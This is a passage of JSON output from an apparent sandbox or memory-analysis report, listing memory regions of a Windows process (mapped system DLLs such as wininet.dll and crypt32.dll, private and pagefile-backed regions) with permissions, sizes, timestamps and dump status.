8791778328576, "timestamp": "00:01:17.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791778787328, "type": "region", "version": 1 }, "end_va": 8791778881535, "entry_point": 8791778787328, "filename": "\\Windows\\System32\\imagehlp.dll", "id": "region_841", "name": "imagehlp.dll", "norm_filename": "c:\\windows\\system32\\imagehlp.dll", "region_type": "memory_mapped_file", "start_va": 8791778787328, "timestamp": "00:01:17.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791781015552, "type": "region", "version": 1 }, "end_va": 8791781838847, "entry_point": 8791781015552, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_842", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791781015552, "timestamp": "00:01:17.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784161280, "type": "region", "version": 1 }, "end_va": 8791784218623, "entry_point": 8791784161280, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_843", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784161280, "timestamp": "00:01:17.644", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000844-addr_0x0000000000190000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_844", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:17.970", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000845-addr_0x00000000002e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_845", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:01:17.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 6193151, "entry_point": 0, "filename": null, "id": "region_846", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:01:17.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791778131968, "type": "region", "version": 1 }, "end_va": 8791778320383, "entry_point": 8791778131968, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_847", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791778131968, "timestamp": "00:01:17.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791779901440, "type": "region", "version": 1 }, "end_va": 8791780986879, "entry_point": 8791779901440, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_848", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791779901440, "timestamp": "00:01:17.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_849", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:19.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_850", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:19.827", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000851-addr_0x00000000000d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_851", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:19.828", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000852-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_852", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:19.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7802879, "entry_point": 0, "filename": null, "id": "region_853", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:01:19.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 28835839, "entry_point": 0, "filename": null, "id": "region_854", "name": "pagefile_0x0000000000780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7864320, "timestamp": "00:01:19.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 32255999, "entry_point": 0, "filename": null, "id": "region_855", "name": "pagefile_0x0000000001b80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28835840, "timestamp": "00:01:19.829", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000856-addr_0x0000000001fe0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 33947647, "entry_point": 0, "filename": null, "id": "region_856", "name": "private_0x0000000001fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33423360, "timestamp": "00:01:19.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2009399296, "type": "region", "version": 1 }, "end_va": 2009427967, "entry_point": 2009399296, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_857", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2009399296, "timestamp": "00:01:19.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791634280448, "type": "region", "version": 1 }, "end_va": 8791643291647, "entry_point": 8791634280448, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_858", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791634280448, "timestamp": "00:01:19.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791650861056, "type": "region", "version": 1 }, "end_va": 8791651102719, "entry_point": 8791650861056, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_859", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791650861056, "timestamp": "00:01:19.840", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791743070208, "type": "region", "version": 1 }, "end_va": 8791743119359, "entry_point": 8791743070208, "filename": "\\Windows\\System32\\version.dll", "id": "region_860", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791743070208, "timestamp": "00:01:19.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791758667776, "type": "region", "version": 1 }, "end_va": 8791758729215, "entry_point": 8791758667776, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_861", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791758667776, "timestamp": "00:01:19.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791759388672, "type": "region", "version": 1 }, "end_va": 8791760859135, "entry_point": 8791759388672, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_862", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791759388672, "timestamp": "00:01:19.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791776886784, "type": "region", "version": 1 }, "end_va": 8791778119679, "entry_point": 8791776886784, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_863", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791776886784, "timestamp": "00:01:19.865", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791782391808, "type": "region", "version": 1 }, "end_va": 8791783612415, "entry_point": 8791782391808, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_864", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 8791782391808, "timestamp": "00:01:19.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791784030208, "type": "region", "version": 1 }, "end_va": 8791784157183, "entry_point": 8791784030208, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_865", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791784030208, "timestamp": "00:01:19.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791784226816, "type": "region", "version": 1 }, "end_va": 8791785123839, "entry_point": 8791784226816, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_866", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791784226816, "timestamp": "00:01:19.883", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791785144320, "type": "region", "version": 1 }, "end_va": 8791786024959, "entry_point": 8791785144320, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_867", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791785144320, "timestamp": "00:01:19.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791786061824, "type": "region", "version": 1 }, "end_va": 8791786524671, "entry_point": 8791786061824, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_868", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791786061824, "timestamp": "00:01:19.945", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791789703167, "entry_point": 8791787241472, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_869", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:01:19.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, "start_va": 8791789731840, "type": "region", "version": 1 }, "end_va": 8791791271935, "entry_point": 8791789731840, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_870", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791789731840, "timestamp": "00:01:20.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791791304704, "type": "region", "version": 1 }, "end_va": 8791793414143, "entry_point": 8791791304704, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_871", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791791304704, "timestamp": "00:01:20.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791756898304, "type": "region", "version": 1 }, "end_va": 8791756959743, "entry_point": 8791756898304, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_872", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791756898304, "timestamp": "00:01:20.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35520511, "entry_point": 0, "filename": null, "id": "region_873", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:01:21.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791741169664, "type": "region", "version": 1 }, "end_va": 8791741353983, "entry_point": 8791741169664, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_874", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791741169664, "timestamp": "00:01:21.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791783636992, "type": "region", "version": 1 }, "end_va": 8791783972863, "entry_point": 8791783636992, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_875", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791783636992, "timestamp": "00:01:21.582", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000876-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_876", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:21.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_877", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:01:21.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791722950656, "type": "region", "version": 1 }, "end_va": 8791723302911, "entry_point": 8791722950656, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_878", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791722950656, "timestamp": "00:01:21.593", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000879-addr_0x0000000001f30000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 33226751, "entry_point": 0, "filename": null, "id": "region_879", "name": "private_0x0000000001f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 32702464, "timestamp": "00:01:21.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 33947648, "type": "region", "version": 1 }, "end_va": 34861055, "entry_point": 0, "filename": null, "id": "region_880", "name": "pagefile_0x0000000002060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33947648, "timestamp": "00:01:21.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791718363136, "type": "region", "version": 1 }, "end_va": 8791718461439, "entry_point": 8791718363136, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_881", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791718363136, "timestamp": "00:01:21.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_882", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:01:21.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 39661567, "entry_point": 0, "filename": null, "id": "region_883", "name": "pagefile_0x00000000021e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35520512, "timestamp": "00:01:21.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 39714816, "type": "region", "version": 1 }, "end_va": 42659839, "entry_point": 39714816, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_884", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 39714816, "timestamp": "00:01:21.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791779246080, "type": "region", "version": 1 }, "end_va": 8791779872767, "entry_point": 8791779246080, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_885", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791779246080, "timestamp": "00:01:21.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_886", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:01:21.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2826239, "entry_point": 0, "filename": null, "id": "region_887", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:01:21.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791735992320, "type": "region", "version": 1 }, "end_va": 8791738040319, "entry_point": 8791735992320, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_888", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791735992320, "timestamp": "00:01:21.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2891775, "entry_point": 0, "filename": null, "id": "region_889", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:21.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791756701696, "type": "region", "version": 1 }, "end_va": 8791756853247, "entry_point": 8791756701696, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_890", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791756701696, "timestamp": "00:01:21.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_891", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:01:21.932", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000892-addr_0x00000000002f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_892", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:21.933", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000893-addr_0x0000000002a90000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44630016, "type": "region", "version": 1 }, "end_va": 45154303, "entry_point": 0, "filename": null, "id": "region_893", "name": "private_0x0000000002a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 44630016, "timestamp": "00:01:21.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791714758656, "type": "region", "version": 1 }, "end_va": 8791714815999, "entry_point": 8791714758656, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_894", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791714758656, "timestamp": "00:01:21.933", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000895-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_895", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:21.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2953215, "entry_point": 2949120, "filename": "\\Windows\\System32\\en-US\\msctf.dll.mui", "id": "region_896", "name": "msctf.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\msctf.dll.mui", "region_type": "memory_mapped_file", "start_va": 2949120, "timestamp": "00:01:21.957", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000897-addr_0x00000000028b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": 